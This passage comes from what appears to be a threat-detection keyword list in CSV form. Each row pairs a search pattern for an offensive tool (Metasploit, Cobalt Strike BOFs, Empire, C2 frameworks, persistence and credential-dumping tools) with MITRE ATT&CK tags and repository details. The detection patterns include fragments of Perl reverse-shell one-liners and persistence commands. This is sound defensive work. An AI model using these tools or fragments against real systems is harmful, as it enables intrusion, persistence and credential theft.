- T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*peinjector.rb*",".{0,1000}peinjector\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*PELoader/PeLoader.*",".{0,1000}PELoader\/PeLoader\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*pem2john.py*",".{0,1000}pem2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Pennyw0rth/NetExec*",".{0,1000}Pennyw0rth\/NetExec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*-pentest*",".{0,1000}\-pentest.{0,1000}","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. repository or command line","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*pentest\\sam.hive*",".{0,1000}pentest\\\\sam\.hive.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*pentest\\system.hive*",".{0,1000}pentest\\\\system\.hive.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*PentestBox*",".{0,1000}PentestBox.{0,1000}","offensive_tool_keyword","pentestbox","PentestBox is an Opensource PreConfigured Portable Penetration Testing Environment for the Windows Operating System","T1043 - T1059 - T1078 - T1082 - T1083 - T1092 - T1095 - T1102 - T1123 - T1132 - T1134 - T1135 - T1140 - T1204 - T1218 - T1219 - T1222 - T1247 - T1496 - T1497 - T1543 - T1552 - T1553 - T1574 - T1583 - T1588 - T1592 - T1596 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://pentestbox.org/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PENTESTING-BIBLE*",".{0,1000}PENTESTING\-BIBLE.{0,1000}","offensive_tool_keyword","PENTESTING-BIBLE","pentest documentation - Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY.","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE","1","1","N/A","N/A","10","12693","2314","2023-04-03T07:40:28Z","2019-06-28T11:26:57Z" "*pentest-machine*",".{0,1000}pentest\-machine.{0,1000}","offensive_tool_keyword","pentest-machine","Automates some pentesting work via an nmap XML file. As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/. Runs fast-returning commands first. Please send me protocols/commands/options that you would like to see included.","T1583 - T1584 - T1580 - T1582 - T1574","TA0002 - TA0001 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/DanMcInerney/pentest-machine","1","1","N/A","N/A","4","315","102","2018-09-07T20:01:41Z","2015-02-26T23:57:21Z" "*pentestmonkey*",".{0,1000}pentestmonkey.{0,1000}","offensive_tool_keyword","Github Username","github repo name - privileges exploitation and offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/pentestmonkey","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*pentestmonkey/php-reverse-shell*",".{0,1000}pentestmonkey\/php\-reverse\-shell.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*pentestmonkey@pentestmonkey.net*",".{0,1000}pentestmonkey\@pentestmonkey\.net.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*PE-Obfuscator.exe*",".{0,1000}PE\-Obfuscator\.exe.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*PE-Obfuscator.git*",".{0,1000}PE\-Obfuscator\.git.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*PE-Obfuscator-main*",".{0,1000}PE\-Obfuscator\-main.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*Pepitoh/VBad*",".{0,1000}Pepitoh\/VBad.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "*perfdata.portswigger.net*",".{0,1000}perfdata\.portswigger\.net.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PerfExec.sln*",".{0,1000}PerfExec\.sln.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","75","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "*PerfExec-main.zip*",".{0,1000}PerfExec\-main\.zip.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","75","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "*Perform AS-REP roasting*",".{0,1000}Perform\sAS\-REP\sroasting.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*Perform full attack chain. Options are identical to RELAY. Tool must be on disk*",".{0,1000}Perform\sfull\sattack\schain\.\sOptions\sare\sidentical\sto\sRELAY\.\sTool\smust\sbe\son\sdisk.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*Perform password spraying for all active users on a domain*",".{0,1000}Perform\spassword\sspraying\sfor\sall\sactive\susers\son\sa\sdomain.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*perform_privilege_escalation_checks(*",".{0,1000}perform_privilege_escalation_checks\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*Performing recursive ShadowSpray attack*",".{0,1000}Performing\srecursive\sShadowSpray\sattack.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*Performs a kerberoasting attack against targeted*",".{0,1000}Performs\sa\skerberoasting\sattack\sagainst\stargeted.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*Perfusion.exe -c*",".{0,1000}Perfusion\.exe\s\-c.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*Perfusion\RegistryPatch.ps1*",".{0,1000}Perfusion\\RegistryPatch\.ps1.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*Perfusion-master.zip*",".{0,1000}Perfusion\-master\.zip.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*perl -e 'use Socket;$*;socket(S,PF_INET,SOCK_STREAM,getprotobyname*",".{0,1000}perl\s\-e\s\'use\sSocket\;\$.{0,1000}\;socket\(S,PF_INET,SOCK_STREAM,getprotobyname.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*perl -MIO -e *new IO::Socket::INET(PeerAddr,""*:*"");STDIN->fdopen(*",".{0,1000}perl\s\-MIO\s\-e\s.{0,1000}new\sIO\:\:Socket\:\:INET\(PeerAddr,\"".{0,1000}\:.{0,1000}\""\)\;STDIN\-\>fdopen\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*perl nikto.pl -h*",".{0,1000}perl\snikto\.pl\s\-h.{0,1000}","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","0","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*perl_no_sh_reverse_tcp.py*",".{0,1000}perl_no_sh_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*perl-reverse-shell.*",".{0,1000}perl\-reverse\-shell\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Permits to backup a DACL before a modification*",".{0,1000}Permits\sto\sbackup\sa\sDACL\sbefore\sa\smodification.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*PersAutorun.cs*",".{0,1000}PersAutorun\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PersCLRInstall.cs*",".{0,1000}PersCLRInstall\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*persist exceladdin*",".{0,1000}persist\sexceladdin.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*persist logonscript*",".{0,1000}persist\slogonscript.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*persist run *hkcu*",".{0,1000}persist\srun\s.{0,1000}hkcu.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*persist run *hklm*",".{0,1000}persist\srun\s.{0,1000}hklm.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*persist runkey*",".{0,1000}persist\srunkey.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*persist spe *.exe*",".{0,1000}persist\sspe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Persist.cna*",".{0,1000}Persist\.cna.{0,1000}","offensive_tool_keyword","AggressorScripts-1","persistence script for cobaltstrike. Persistence Aggressor Scripts for Cobalt Strike 3.0+","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/AggressorScripts-1/tree/master/Persistence","1","1","N/A","N/A","1","2","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z" "*Persist\autorun.cs*",".{0,1000}Persist\\autorun\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*Persist\eventviewer.cs*",".{0,1000}Persist\\eventviewer\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*Persist\powershell.cs*",".{0,1000}Persist\\powershell\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*Persist\screensaver.cs*",".{0,1000}Persist\\screensaver\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*Persist\startup.cs*",".{0,1000}Persist\\startup\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*Persist\winlogon.cs*",".{0,1000}Persist\\winlogon\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*PersistBOF.cna*",".{0,1000}PersistBOF\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*Persistence.cpp*",".{0,1000}Persistence\.cpp.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*Persistence.exe*",".{0,1000}Persistence\.exe.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*Persistence.psm1*",".{0,1000}Persistence\.psm1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Persistence.psm1*",".{0,1000}Persistence\.psm1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1117","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 